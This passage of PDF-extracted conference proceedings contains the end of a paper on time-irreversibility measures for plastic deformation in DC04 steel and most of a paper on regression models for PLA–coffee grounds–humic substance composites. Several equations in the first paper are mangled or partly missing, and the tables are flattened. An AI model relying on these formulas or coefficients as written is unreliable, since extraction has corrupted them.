where a = C(Pi+ ) denotes the number of points above LI; m = C(Pi+ ) + C(Pi− ) means the number of points in the Poincaré plot except those which are not on LI; Di+ is the distance of points above the line to itself, and Di is the distance of point Pi (g(i), g(i + τ )) to LI which can be defined as Di =
|g(i + τ ) − g(i)| . √ 2
(7)
2.3.3 Costa’s Index (CIx) Costa’s index [11] represents a simplified version of [9], where number of increments (g(t + τ ) − g(t) > 0) and decrements (g(t + τ ) − g(i) < 0) are taken into account. They are presented to be symmetric if equal to each other. The procedure is implemented for multiscale two-dimensional plane (g(t), g(t + τ )), where new coarse-grained series yτ (t) = g(t + τ ) − g(t) for 1 ≤ t ≤ N − τ displays the asymmetry of the increment series, and the time irreversibility index over a range of scales τ is calculated by the following equation: yτ >0 H yτ − yτ 0. For EIx ≈ 0, the studied segment is presented to be reversible. 2.3.5 Area Index (AIx) AI [61] is defined as the cumulative area of the sectors corresponding to the points that are located above the line of identity (LI) divided by the cumulative area of sectors corresponding to all points in the Poincaré plot (except those that are located exactly on LI). The area of a sector corresponding to a particular point Pi in the Poincaré plot is calculated as 1 (11) Si = × Rθi × r 2 2 for which r is the radius of the sector; Rθi = θLI − θi ; θLI is the phase angle of LI, and θi = atan g(i + τ )/g(i) , which defines the phase angle of the i-th point. Then, AIx is calculated according to the following equation: a |Si | AIx = i=1 , (12) m i=1 |Si |
where a = C Pi+ denotes number of points above LI, and m is the overall distribution of points in the Poincaré plot (except those that are located exactly on LI). 2.3.6 Slope Index (SIx) In addition to the presented above measures, it was proposed to calculate the irreversibility of a signal from the ratio of the phase angle of points above LI to all points in Poincaré plot [30]: a |Rθ i | (13) SIx = i=1 m i=1 |Rθ i | 2.4 Multiscale Time Irreversibility Index For the following procedure [9], first of all, we need to construct coarse-grained time series which can be defined as N 1 jτ (14) yτ (j) = g(i), for 1 ≤ j ≤ . i=(j−1)τ +1 τ τ
Irreversibility of Plastic Deformation Processes in Metals
433
Then, using a statistical physics approach, we make the simplifying assumptions that each transition (increase or decrease of yτ (j)) is independent and requires a specific amount of “energy” E. The probability density function of this class of system [27] can be assumed to follow ρ ∝ e−βE−γ Q , where Q represents the non-equilibrium heat flux across the boundary of the system, and β and γ are the Lagrange multipliers derived from the constraints on the average value of the energy E per transition and the average contribution of each transition to the heat flux Q. Since the time-reversal operation on the original time series inverts an increase to a decrease and vice versa, the difference between the average energy for the activation of information rate, i.e. βE + γ Q yτ >0 , and the relaxation of information rate, i.e. βE + γ Q yτ 0. In case when A(τ ) = 0, the time series may be reversible for scale τ. For the analysis of discrete values, Eq. (16) can be presented as Pr(yτ )ln Pr(yτ ) Pr(yτ )ln Pr(yτ ) y >0 y 0 τ yτ 0 is satisfied. Accordingly, to satisfy the above two conditions at the critical stages of strain hardening, it is necessary for dS e to be negative, i.e. entropy tends to decrease. At the same time, the paired autocorrelation function demonstrates noticeable processes of self-organization in these areas (Fig. 12) [51].
Fig. 12. Dynamics of the Shannon entropy (ShEn) and the autocorrelation function (Ac) at the moments of self-organized plastic strain localization avalanches
Figure 12 also shows the dynamics of Shannon entropy. It is obvious that the characteristic sharp jumps (“dips”) in the value of ShEn in the region of the onset of plastic flow and the region of global crack formation correspond to self-organization processes.
442
A. Kiv et al.
6 Conclusions In this study, we have presented the measures of a quantitative assessment of the irreversibility of the deformation processes. For the first time, multiscale asymmetry coefficient, Poincaré-, network- and permutation-based measures are found to be especially informative measures, which can be used not only to monitor and classify the stages of deformation but also as a precursor of the material irreversible destruction process. We have tested the possibility to detect periods of irreversibility with the presented measures on the example of the stress-strain curve time series σ () for DC04 steel. Our results have shown that the regimes of the transition from elastic to plastic region and the fracture area are presented to be irreversible, whereas all other regimes seem to be globally reversible. We could see that the emergence and development of defect structures that appear during the deformation of metals form complex, non-linear, heterogenous, i.e. self-organized dynamics, which is far from thermodynamic equilibrium. The identified regimes of self-organization (instability) are characterized with the asymmetry in their dynamics, low entropy production in the development of metal, and it is supported by high autocorrelation (long-term memory) effect. Further, it would be interesting to study inhomogeneous defect structures formation with the usage of multifractal [4, 15, 19, 20, 23, 25, 29, 40, 46, 57], information [4, 55, 56], network [4, 5, 63], chaos theory [54, 57], or machine (deep) learning [31]. Acknowledgements. This work was supported in part by the Ministry of Education and Science of Ukraine (projects No. 0121U109543, 0122U000850, and 0122U000874) and National Research Foundation of Ukraine (project No. 2020.02/0100). T.K. also acknowledges the SAIA (Slovak Academic Information Agency) for scholarship in the Institute of Physics of Slovak Academy of Sciences in the framework of the National Scholarship Programme of the Slovak Republic.
References 1. Anderson, P.W.: More is different. Broken symmetry and the nature of the hierarchical structure of science. Science 177, 393–396 (1972) 2. Bandt, C., Pompe, B.: Permutation entropy: a natural complexity measure for time series. Phys. Rev. Lett. 88, 174102 (2002) 3. Basaran, C., Nie, S.: An irreversible thermodynamics theory for damage mechanics of solids. Int. J. Damage Mech. 13, 205–223 (2004) 4. Bielinskyi, A., Semerikov, S., Serdyuk, O., Solovieva, V., Soloviev, V., Pichl, L.: Econophysics of sustainability indices. In: CEUR Workshop Proceedings, vol. 2713, pp. 372–392 (2020) 5. Bielinskyi, A., Soloviev, V.: Complex network precursors of crashes and critical events in the cryptocurrency market. In: CEUR Workshop Proceedings, vol. 2292, pp. 37–45 (2018) 6. Bielinskyi, A.O., Hushko, S.V., Matviychuk, A.V., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Irreversibility of financial time series: a case of crisis. In: CEUR Workshop Proceedings, vol. 3048, pp. 134–150 (2021) 7. Bielinskyi, A.O., Serdyuk, O.A., Semerikov, S.O., Soloviev, V.N.: Econophysics of cryptocurrency crashes: a systematic review. In: CEUR Workshop Proceedings, vol. 3048, pp. 31–133 (2021)
Irreversibility of Plastic Deformation Processes in Metals
443
8. Boschan, J., Luding, S., Tighe, B.P.: Jamming and irreversibility. Granular Matter 21(3), 1–7 (2019) 9. Costa, M., Goldberger, A.L., Peng, C.K.: Broken asymmetry of the human heartbeat: loss of time irreversibility in aging and disease. Phys. Rev. Lett. 95, 198102 (2005) 10. Costa, M., Goldberger, A.L., Peng, C.K.: Multiscale entropy analysis of biological signals. Phys. Rev. E. 71, 021906 (2005) 11. Costa, M.D., Peng, C.K., Goldberger, A.L.: Multiscale analysis of heart rate dynamics: entropy and time irreversibility measures. Cardiovasc Eng. 8, 88–93 (2008) 12. Cox, D.R., Hand, D., Herzberg, A.: Foundations of Statistical Inference, Theoretical Statistics, Time Series and Stochastic Processes. Cambridge University Press, London (2005) 13. Delpha, C., Diallo, D., Wang, T., Liu, J., Li, Z.: Multisensor fault detection and isolation using Kullback Leibler divergence: application to data vibration signals. In: 2017 International Conference on Sensing, Diagnostics, Prognostics, and Control (SDPC), Shanghai, China (2017) 14. Donges, J.F., Donner, R.V., Kurths, J.: Testing time series irreversibility using complex network methods. EPL 102, 10004 (2013) 15. Dro˙zd˙z, S., O´swi¸ecimka, P.: Detecting and interpreting distortions in hierarchical organization of complex time series. Phys. Rev. E. 91, 030902 (2015) 16. Ehlers, C.L., Havstad, J., Prichard, D., Theiler, J.: Low doses of ethanol reduce evidence for nonlinear structure in brain activity. J. Neurosci. 18, 7474–7486 (1998) 17. Filippatos, A., Langkamp, A., Kostka, P., Gude, M.: Sequence-based damage identification method for composite rotors by applying the Kullback-Leibler divergence, a two-sample Kolmogorov-Smirnov test and a statistical hidden Markov model. Entropy 21, 690 (2019) 18. Flanagan, R., Lacasa, L.: Irreversibility of financial time series: a graph-theoretical approach. Phys. Lett. A 380, 1689 (2016) 19. Frisch, U., Parisi, G.: On the singularity structure of fully developed turbulence. In: Ghil, M., Benzi, R., Parisi, G. (eds.) Turbulence and Predictability of Geophysical Flows and Climate Dynamics, pp. 84–88. North-Holland, New York (1985) 20. Grassberger, P.: Generalized dimensions of strange attractors. Phys. Lett. A 97, 227–230 (1983) 21. Grosse, I., Bernaola-Galván, P., Carpena, P., Román-Roldán, R., Oliver, J., Stanley, H.E.: Analysis of symbolic sequences using the Jensen-Shannon divergence. Phys. Rev. E. 65, 041905 (2002) 22. Guzik, P., Piskorski, J., Krauze, T., Wykretowicz, A., Wysocki, H.: Heart rate asymmetry by Poincaré plots of RR intervals. Biomedizinische Technik. Biomed. Eng. 51, 272–275 (2006) 23. Halsey, T.C., Jensen, M.H., Kadanoff, L.P., Procaccia, I., Shraiman, B.I.: Fractal measures and their singularities − the characterization of strange sets. Phys. Rev. A 33, 1141–1151 (1986) 24. Hell-Mann, M.: What is complexity? Complexity 1, 16–19 (1995) 25. Hurst, H.E.: Long-term storage capacity of reservoirs. Trans. Am. Soc. Civ. Eng. 116, 770–799 (1951) 26. Ji, H., He, X., Zhou, D.: Diagnosis of sensor precision degradation using Kullback-Leibler divergence. Can. J. Chem. Eng. 96, 434–443 (2018) 27. Jou, D., Casas-Vazquez, J., Lebon, G.: Extended irreversible thermodynamics. Rep. Prog. Phys. 51, 1105 (1988) 28. Kahirdeh, A., Sauerbrunn, C., Yun, H., Modarres, M.: A parametric approach to acoustic entropy estimation for assessment of fatigue damage. Int. J. Fatigue 100(part 1), 229–237 (2017) 29. Kantelhardt, J.W., Zschiegner, S.A., Koscienlny-Bunde, E., Bunde, A., Havlin, S., Stanley, H.E.: Multifractal detrended fluctuation analysis of non-stationary time series. Phys. A 316, 87–114 (2002)
444
A. Kiv et al.
30. Karmakar, C.K., Khandoker, A.H., Palaniswami, M.: Phase asymmetry of heart rate variability signal. Physiol. Meas. 36, 303–314 (2015) 31. Kiv, A.E., et al.: Machine learning for prediction of emergent economy dynamics. In: CEUR Workshop Proceedings, vol. 3048, pp. i–xxxi (2021) 32. Koca´nda, A., Jasi´nski, C.: Extended evaluation of Erichsen cupping test results by means of laser speckle. Arch. Civil Mech. Eng. 16(2), 211–216 (2015) 33. Kostina, A., Plekhov, O.: The entropy of an Armco iron under irreversible deformation. Entropy 17, 264–276 (2015) 34. Kwapien, J., Drozdz, S.: Physical approach to complex systems. Phys. Rep. 515, 115–226 (2012) 35. Lacasa, L., Flanagan, R.: Time reversibility from visibility graphs of nonstationary processes. Phys. Rev. E 92, 022817 (2015) 36. Lacasa, L., Nuñez, A., Roldán, É.: Time series irreversibility: a visibility graph approach. Eur. Phys. J. B 85, 217 (2012) 37. Lawrance, A.: Directionality and reversibility in time series. Int. Stat. Rev. 59, 67–79 (1991) 38. Li, J., Shang, P.: Time irreversibility of financial time series based on higher moments and multiscale Kullback-Leibler divergence. Phys. A 502, 248–255 (2018) 39. Luque, B., Lacasa, L., Ballesteros, F., Luque, J.: Horizontal visibility graphs: exact results for random time series. Phys. Rev. E. 80, 046103 (2009) 40. Meakin, P.: Fractals, Scaling and Growth far from Equilibrium. Cambridge University Press, Cambridge (1998) 41. Newman, M.E.J.: The structure and function of complex networks. SIAM Rev. 45, 167–256 (2003) 42. Nguyen, T.K., Ahmad, Z., Kim, J.M.: A deep-learning-based health indicator constructor using Kullback-Leibler divergence for predicting the remaining useful life of concrete structures. Sensors (Basel) 22, 3687 (2022) 43. Nicolis, G., Prigogine, I.: Self-organization in Nonequilibrium Systems: From Dissipative Structures to Order Through Fluctuations. Wiley, New York (1977) 44. Osara, J.A., Bryant, M.D.: Thermodynamics of fatigue: degradation-entropy generation methodology for system and process characterization and failure analysis. Entropy 21, 685 (2019) 45. Parisi, G.: Complex systems: a physicist’s viewpoint. Phys. A 263, 557–564 (1999) 46. Peng, C.K., Buldyrev, S.V., Havlin, S., Simons, M., Stanley, H.E., Goldberger, A.L.: Mosaic organization of DNA nucleotides. Phys. Rev. E. 49, 1685–1689 (1994) 47. Porta, A., Guzzetti, S., Montano, N., Gnecchi-Ruscone, T., Furlan, R., Malliani, A.: Time reversibility in short-term heart period variability. In: Computers in Cardiology, pp. 77–80. IEEE (2006) 48. Prigogine, I.: Exploring complexity. Eur. J. Oper. Res. 30, 97–103 (1987) 49. Puglisi, A., Villamaina, D.: Irreversible effects of memory. EPL 88, 30004 (2009) 50. Qui, L., Yuan, S., Bao, Q., Huang, T.: An on-line continuous updating Gaussian mixture model for damage monitoring under time-varying structural boundary condition. In: EWSHM - 7th European Workshop on Structural Health Monitoring. IFFSTTAR, Inria, Université de Nantes, Nantes, France (2014) 51. Sethna, J.P., et al.: Deformation of crystals: connections with statistical physics. Annu. Rev. Mater. Res. 47, 217–246 (2017) 52. Shaohua, T., Zhibo, Y., Zhengjia, H., Xuefeng, C.: Damage identification by the KullbackLeibler divergence and hybrid damage index. Shock. Vib. 2014, 22 (2014) 53. Siegenfeld, A.F., Bar-Yam, Y.: An introduction to complex systems science and its applications. Complexity 2020, 1–16 (2020)
Irreversibility of Plastic Deformation Processes in Metals
445
54. Soloviev, V., Bielinskyi, A., Serdyuk, O., Solovieva, V., Semerikov, S.: Lyapunov exponents as indicators of the stock market crashes. In: CEUR Workshop Proceedings, vol. 2732, pp. 455– 470 (2020) 55. Soloviev, V., Bielinskyi, A., Solovieva, V.: Entropy analysis of crisis phenomena for DJIA index. In: CEUR Workshop Proceedings, vol. 2393, pp. 434–449 (2019) 56. Soloviev, V.N., Bielinskyi, A.O., Kharadzjan, N.A.: Coverage of the coronavirus pandemic through entropy measures. In: CEUR Workshop Proceedings, vol. 2832, pp. 24–42 (2020) 57. Sornette, D.: Critical Phenomena in Natural Sciences: Chaos, Fractals, Self-organization and Disorder: Concepts and Tools. Springer, Heidelberg (2006). https://doi.org/10.1007/3-54033182-4 58. Stone, L., Landan, G., May, R.M.: Detecting time’s arrow: a method for identifying nonlinearity and deterministic chaos in time-series data. Proc. R. Soc. Lond. B 263, 1509–1513 (1996) 59. Sun, F., Zhang, W., Wang, N., Zhang, W.A.: Copula entropy approach to dependence measurement for multiple degradation processes. Entropy 21, 724 (2019) 60. Vinogradov, A., Yasnikov, I.S., Estrin, Y.: Stochastic dislocation kinetics and fractal structures in deforming metals probed by acoustic emission and surface topography measurements. J. Appl. Phys. 115, 1–10 (2014) 61. Yan, C., et al.: Area asymmetry of heart rate variability signal. BioMed. Eng. OnLine 16, 112 (2017) 62. Zanin, M., Rodríguez-González, A., Menasalvas Ruiz, E., Papo, D.: Assessing time series reversibility through permutation patterns. Entropy 20, 665 (2018) 63. Zou, Y., Donner, R.V., Marwan, N., Donges, J.F., Kurths, J.: Complex network approaches to nonlinear time series analysis. Phys. Rep. 787, 1–97 (2019) 64. Zuev, L.B., Barannikova, S.A.: Autowaves of localized plastic flow, velocity of propagation, dispersion, and entropy. Phys. Met. Metallogr. 112, 109 (2011)
Computer Modeling of Chemical Composition of Hybrid Biodegradable Composites Vladimir Lebedev(B) , Denis Miroshnichenko, Dmytro Savchenko, Daria Bilets, Vsevolod Mysiak, and Tetiana Tykhomyrova Kharkiv Polytechnic Institute, Kharkiv, Ukraine [email protected]
Abstract. The purpose of the article is to research chemical composition of hybrid eco-friendly biodegradable filled composites by computer modeling method. The tasks of the research are to form a data array for various polymer composite systems based on polylactic acid, coffee grounds waste and humic substances in terms of their level of impact strength and breaking stress during bending at various chemical compositions, the formation of experimental and statistical mathematical models chemical composition of hybrid eco-friendly biodegradable filled composites and processing of the resulting mathematical models in the MathCad Prime 6.0 environment in order to predict the most important strength characteristics of hybrid eco-friendly biodegradable filled composites. The design of experimentalstatistical mathematical models in the form of regression equations was done with the help of the computer program STATISTICA. Processing of mathematical models was performed in MathCad Prime 6.0. As a result of the research, models for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites depending on their chemical composition, which can be adapted to any content of coffee grounds waste and humic substances, were built. Keywords: Computer · modeling · chemical composition · hybrid · biodegradable · composites
1 Introduction The last 10 years the current world’s trend is the use of environmentally friendly biodegradable polymer materials [1]. According to the production method, environmentally friendly biodegradable polymer materials can be [2, 3]: • polymers that are directly derived from plant or animal biomass (polysaccharides, proteins, lipids, etc.), • polymers obtained by classical chemical synthesis from renewable monomers on a biological basis, such as polylactic acid (PLA), • polymers obtained by natural or genetically modified microorganisms, such as polyhydroxyalkanoates (PHAs), polyhydroxybutyrates (PHBs), bacterial cellulose, xanthan, gelan, pullulan and others. The use of such a large range of environmentally friendly biodegradable polymer matrices makes it possible to obtain polymer materials with sufficient gas insulation © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 446–458, 2023. https://doi.org/10.1007/978-3-031-35467-0_27
Computer Modeling of Chemical Composition
447
and heat resistance, which can be processed into different products and parts for various industries [4]. That is why the world trend in various industries is the use of environmentally friendly polymer materials and compositions that do not have a negative impact on the environment and have better operational and aesthetic advantages compared to other materials. These include such properties as high strength and durability, light weight and wide possibilities in design, color scheme and other important aesthetic characteristics. A characteristic feature of the production of structures and products from environmentally friendly polymer materials production is the set of the task of optimizing their component composition and performance. In fact, almost always the high quality and durability of polymer products and structures are due to a set of correct material choice and the choice of the most effective processing method. Based on the analysis of scientific and technological development in the area of designing and using environmentally friendly polymer materials, the task of developing a set of basic technological solutions for creating effective products from them, as well as new approaches to modeling technological processes and designing products using environmentally friendly polymer materials is very relevant. One of the main approaches that ensure the fulfillment of a set of tasks is the transition to computer-aided design of products from environmentally friendly polymer materials. In such cases, it becomes possible to use complex models based on environmentally friendly polymer materials, take into account the physical, chemical characteristics, features and requirements of production processes, as well as the possible behavior of the material during the operation of wares made from them. Modeling of products made from environmentally friendly polymer materials cannot be carried out without understanding the areas of their application and predicting the prospects for use in specific products or functional systems. Thus, the design of products from polymer materials is a very difficult task in terms of creating new polymer materials, because it requires appropriate technological and design information for the developed wares, equipment for their manufacture, as well as various technological parameters for their processing. Thus, almost always the high quality and durability of polymer products and details are caused by a complex of material’s correct choice and the choice of the most effective method of their processing. A modern trend in areas of production, using and disposal of polymer materials is eco-friendly biodegradable polymers and their compositions, which implement the principle of «zero waste» throughout the life cycle. One of the most effective polymers, which is the most often used for the production of bioplastics, is synthetic polyester PLA [1]. PLA relates to bioplastics of the natural production cycle, because it is obtained by fermentation of raw materials and waste from various crops rich in starch: such as corn, beets or wheat bran [2]. In fact, PLA implements the principle of «zero waste» and allows to avoid any kind of competition between different industries, due to the fact that it is a bioplastic which is obtained from by-products of the agro-food industry. However, along with the presence of a wide range of useful properties in comparison with the most widely used petrochemical plastics, PLA is characterized by low vapor and gas tightness [2, 3], which significantly limits its scope. For eliminating the above-mentioned disadvantages of PLA, different directions of its functional modification with other bioplastics or fillers of organic and inorganic nature are used. One of the most effective directions is to obtain PLA compositions filled with coffee waste. Today, there is a significant amount of research on
448
V. Lebedev et al.
coffee grounds as a filler in polymer composite materials [4–9], as a source of important ingredients such as oil, terpenes, caffeine and polyphenols [10, 11]. Herewith traditional coffee bean disposal includes mainly compost and soil fertilizers [5], but recently its chemical composition, rich in dietary fiber, phenolic compounds and melanoidins [6], has aroused great interest in the food [7], cosmetics and pharmaceutical industries [12]. Unfortunately, these methods cannot be considered the most cost-effective, especially given the high availability of such wastes, which are estimated at around 2 billion tonnes per year [13]. Scientific articles [14, 15] also studied bioplastic polymer matrices filled with coffee grounds waste, but these works are more scientific than applied industrial in nature. Our previous works [16–18] established the high efficiency of the processes of obtaining eco-friendly biodegradable polymer composite materials based on PLA and coffee grounds waste, which are characterized by high strength characteristics and resistance to many aggressive environments. Further researches on the development and study of hybrid eco-friendly biodegradable polymer composite materials based on PLA and coffee grounds waste with their combined functional hybrid modification with humic substances (HS), which were studied in previous researches as structuring agents in different types of biopolymers [19, 20] and [21], are very relevant, allow to increase the crystallization and strength of PLA compositions. That is why it is very useful to design and model effective chemical compositions of hybrid eco-friendly biodegradable polymer composite materials based on bioplastics, such as PLA, coffee grounds waste with their compatible functional hybrid modification with HS in order to achieve an optimal set of operational properties in such biodegradable polymer composite materials. The purpose of the article is to research the chemical composition of hybrid ecofriendly biodegradable filled composites by computer modeling method. The tasks of the research are: • formation of a data array for various polymer composite systems PLA-HS and PLAHS-coffee grounds waste regarding their level of impact strength and breaking stress during bending at different chemical compositions; • formation of experimental and statistical mathematical models of the chemical composition of hybrid eco-friendly biodegradable filled composites; • processing of the obtained mathematical models in the MathCad Prime 6.0 environment in order to predict the most important strength characteristics of hybrid eco-friendly biodegradable filled composites.
2 Materials and Methods The objects of study were: • plastic bland of PLA Terramac TP-4000; • coffee grounds waste, gathered in 8 different coffee shops in Kharkiv and dried to instant moisture content 0,5%. Coffee grounds waste has polyfractional composition in the particle size limit from 0.5 mm to 1 mm; • HS, which were obtained by extraction of brown coal with alkaline solution of sodium pyrophosphate, followed by extraction with 1% sodium hydroxide solution and precipitation with mineral acid. Indicators of the quality of brown coal, which was used for obtaining HS, are given in Tables 1 and 2.
Computer Modeling of Chemical Composition
449
Table 1. Proximate analysis of brown coal* Sample
1
Proximate analysis, % mass Wa
Ad
Sdt Sdaf t
Vdaf (Vd )
16.8
48.7
2.08 (2.50)
56.7 (29.1)
2
8.1
8.3
1.72 (1.87)
47.7 (43.7)
3
30.6
36.7
2.78 (4.00)
63.0 (43.7)
*Wa – moisture contents, %; Ad – ash content, %; Sdt – content of sulfur, %; Vdaf – volatile matter, %. Table 2. Ultimate analysis of brown coal* Sample
Ultimate analysis, % mass Cdaf
Hdaf
Ndaf
Sdaf t
Odaf d
1
80.83
4.48
1.29
2.50
10.90
2
68.10
4.57
1.35
1.87
24.11
3
60.71
4.87
1.30
4.00
29.12
*Cdaf – content of carbon, %; Hdaf – content of hydrogen, %; Ndaf – content of nitrogen, %; Odaf d – content of oxygen, %.
The essence of the method is to treat an analytical sample of fuel with an alkaline solution of sodium pyrophosphate, followed by extraction of the sample with a solution of sodium hydroxide, precipitation of humic acids with excess mineral acid and determining the mass of the precipitate. The study of impact strength and breaking stress during bending of the samples, without notching at a temperature 20 °C, was carried out on a pendulum head according to ISO 180 and ISO 178, respectively. The design of experimental-statistical mathematical models in form like equal regressions was carried out using the additional computer program STATISTICA. Processing of mathematical models was performed in MathCad Prime 6.0.
3 Experiments Hybrid eco-friendly biodegradable composites were obtained by extruding pre-prepared raw materials in a single-screw laboratory extruder at a temperature of 170–200 °C and a roll rotation speed of 30–100 rpm. The L/D ratio of the extruder was 25, and in order to increase the uniformity of dispersed waste distribution in the finish compositions, 2 mass passes were used to obtain finished samples. 20 parallel experiments were carried out for each composition, statistical processing was made according to such characteristics as the arithmetic mean, standard deviation and coefficient of variation.
450
V. Lebedev et al.
4 Results The initial stage of experimental studies included the formation of a data array for various polymer composite systems PLA-HS and PLA-HS-coffee grounds waste in terms of their level of impact strength and breaking stress during bending, while 20 parallel experiments were performed for each composition under study. In the first PLA-HS systems, strength characteristics were studied when the content of HS was at 0.25, 0.5 and 0.75% mass. The effect of hybrid modification of HS on the strength properties of PLA is shown in Fig. 1 and 2. Due to the hybrid modification of PLA by HS there is an increase in strength properties, while increasing the impact strength and breaking stress during bending in the PLA-HS system with hybrid modification occurs in a number of HS 3 > 2 > 1, with the optimal content of HS in PLA-HS system is 0.5% mass of HS. Therefore, the development of hybrid eco-friendly biodegradable filled composites based on PLA, HS and coffee grounds was carried out taking into account the fact that it was found that the optimal content of HS in PLA-HS systems is 0.5% mass.
Fig. 1. Graphic dependence of impact strength of PLA-HS systems on the content of different types of HS
Further, the systems PLA-HS-coffee grounds were studied at the optimal content of HS at the level of 0.5% mass and variable content of coffee grounds waste 20, 40 and 60% mass. Using IR spectroscopy methods, it has been shown [16, 17] that coffee grounds, in their chemical composition, are characterized by up to 6% or more content of caffeine, alkaloids and their companions, up to 1% of chlorogenic acids and their derivatives content. The general performance of the peak in the absorption length range from 2900 cm−1 to 1800 cm−1 indicates the presence of water in the samples. For the coffee grounds this is the expected result, since during the drying process the water content was reduced only to 50%, besides in the coffee grounds, as in any filler of
Computer Modeling of Chemical Composition
451
Fig. 2. Graphic dependence of breaking stress during bending of PLA-HS systems on the content of different types of HS
organic (vegetable) origin, the phenomenon of intramolecular liquid is also present. If the coffee grounds are not completely dried to the PLA, the available water prevents the thermal destruction of the coffee grounds, since it evaporates during heating and cools the mixture. This reduces the total temperature of mixture processing by extrusion. The temperature of the sample production is selected by the melting point of the polymer and the critical temperature for the coffee grounds. Thus, for the coffee grounds the temperature of self-ignition is 245 °C, the temperature of destruction beginning is 210 °C. The optimum processing temperature is the range t = 180–190 °C. The decrease in the intensity of the peak responsible for water in the composite material as compared to the coffee grounds indicates that the water is distorted during the heating process. The melting point of chlorogenic acid is 208 °C, so since the processing temperature of the composite material does not exceed 190 °C, it does not undergo exhaustion or destruction. Next, the optimal content of coffee grounds waste in hybrid eco-friendly biodegradable filled composites based on PLA, coffee grounds waste and HS in terms of achieving maximum physical and mechanical properties: impact strength and breaking stress during bending is shown in Fig. 3 and 4. Figure 3 shows that if we compare the dependence of impact strength of highly filled systems of hybrid PLA-HS-coffee grounds waste systems on the content of coffee grounds waste, there is a tendency for the value of the latter to increase with increasing the content of the filler. These data show an increase in impact strength for coffeefilled PLA-HS systems in 2.5 times for a sample with a content of coffee grounds waste 50% mass, which is predictable, because filled polymer materials always have a higher impact strength in comparison with homopolymers. The increase in the value of
452
V. Lebedev et al.
Fig. 3. Graphic dependence of impact strength of PLA-HS-coffee grounds waste systems on the content of coffee grounds waste
Fig. 4. Graphic dependence of breaking stress during bending of PLA-HS-coffee grounds systems on the content of coffee grounds
breaking stress during bending (Fig. 4) also indicates the processability of hybrid ecofriendly biodegradable filled composites based on PLA, coffee grounds and HS. Thus, it becomes obvious that coffee grounds are evenly distributed in the hybrid matrix PLA-HS [21]. At the same time, it even somewhat “softens” the original rather rigid PLA polymer. All this, together with the impact strength data, allows us to make assumptions about
Computer Modeling of Chemical Composition
453
the possibility of forming a variety of products from the composite material, herewith the composition with a coffee content of 50% mass deserves special attention. It is also important to clarify that the increase in the complex of physical and mechanical properties of hybrid eco-friendly biodegradable filled composites based on PLA, coffee grounds waste and HS is associated with a decrease in specific surface area from 5.1 m2 /cm to 2.8 m2 /cm, indicating the fact that the introduction of coffee grounds waste increases the homogeneity of the hybrid PLA-HS-coffee grounds waste systems.
5 Discussion The regression equations of the dependence of the strength properties of the PLA-HS and PLA-HS-coffee grounds waste systems on the main indicators of the quality of the brown coal, which was used for obtaining HS, were determined (Tables 3 and 4). The experimental and statistical mathematical model was developed like a regression equation for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites depending on the content of the dispersed phase in the form of coffee grounds waste and HS3, as the most effective in terms of increasing the complex of mine properties (Table 5). Table 3. The regression equations of the dependence of the strength properties of the PLA-HS systems on the main indicators of the quality of the brown coal, which was used for obtaining HS* No.
1
Equation type IS = 24.4301 − 0.1392 · C daf + 5.4667 · HA
3
daf IS = 11.6502 + 0.1427 · Od + 5.4667 · HA IS = 7.3746 + 0.1313 · V daf + 5.4667 · HA
4
BSDB = 193.2687 − 0.8391 · C daf + 62.5333 · HA
2
5 6
daf BSDB = 115.8122 + 0.8805 · Od + 62.5333 · HA BSDB = 103.8457 + 0.5518 · V daf + 62.5333 · HA
Statistical assessment R2
R
0.65
0.81
1.64
0.62
0.79
1.69
0.53
0.73
1.88
0.72
0.85
13.70
0.71
0.84
13.84
0.64
0.80
15.38
SE, mPa
*IS – impact strength; BSDB – breaking stress during bending; HA – content of humic suctances; R2 – coefficient of determination; R – correlation coefficient; SE – standard error
As a result of performing the regression analysis with the purpose of one mathematical model for both investigated strength characteristics, the coefficients k1 –k10 in the regression equation (Table 5) were determined, which have different values depending on which indicator is the target for the hybrid eco-friendly biodegradable filled composites: impact strength or breaking stress during bending. Also created mathematical model in form of regression equation (Table 5) was performed in MathCad Prime 6.0. For this model, theoretical calculations of the predicted values of impact strength and breaking stress during bending were carried out, which are presented in the form of threedimensional graphics for forecasting the performance properties of hybrid eco-friendly
454
V. Lebedev et al.
Table 4. The regression equations of the dependence of the strength properties of PLA-HS-coffee grounds waste systems on the main indicators of the quality of the brown coal, which was used for obtaining HS, and the content of coffee grounds waste* No.
7
Equation type
Statistical assessment
IS = 47.1167 − 0.3513 · C daf + 0.1917 · CG
9
daf IS = 14.8180 + 0.3625 · Od + 0.1917 · CG IS = 5.6861 + 0.3025 · V daf + 0.1917 · CG
10
BSDB = 448.2729 − 3.6454 · C daf + 4.5502 · CG
8
11 12
daf BSDB = 112.8920 + 3.7724 · Od + 4.5502 · CG BSDB = 25.7944 + 3.0061 · V daf + 4.5502 · CG
R2
R
0.31
0.56
9.13
0.28
0.53
9.18
0.25
0.50
9.48
0.80
0.90
62.00
0.80
0.90
62.82
0.76
0.87
67.77
SE, mPa
*CG – content of coffee grounds waste
biodegradable filled composites depending on the content of the dispersed phase in the form of coffee grounds waste and HS3, as the most effective in terms of increasing the complex of mine properties (Fig. 5 and 6). As a result of obtained surfaces, it becomes possible according to the most important target indicator of the strength of hybrid ecofriendly biodegradable filled composites in the form of impact strength or breaking stress during bending to determine their optimized composition, which will also ensure their sufficient level of manufacturability in terms of the ability to be processed by a wide range of methods: injection molding, extrusion, etc. Table 5. The regression equations for forecasting the performance properties of hybrid ecofriendly biodegradable filled composites* Regression coefficients
IS, MPa
BSDB, MPa
k1
0.1572
0.0337
k2
4.340
0.7547
k3
−37.341
−10.258
k4
215.84
−2.040
k5
−5.448
0.9076
k6
0.0436
−0.0107
k7
126.57
−193.74
k8
−10.045
9.623
k9
0.250
−0.1323 (continued)
Computer Modeling of Chemical Composition
455
Table 5. (continued) Regression coefficients
IS, MPa
BSDB, MPa
k10
−1.862 * 10–3
5.8535 * 10–4
R2
0.90
0.91
R
0.95
0.96
SE, mPa
6.34
40.67
Statistical assessment
Equation type IS(BSDB) = k1 · CG · HA2 + k2 · CG 3 + k3 · HA2 + k4 · HA + k5 · CG · HA + k6 · CG 2 · HA + k7 + k8 · CG + k9 · CG 2 + k10 HA3
Fig. 5. 3D graphic for forecasting breaking stress during bending of hybrid eco-friendly biodegradable filled composites
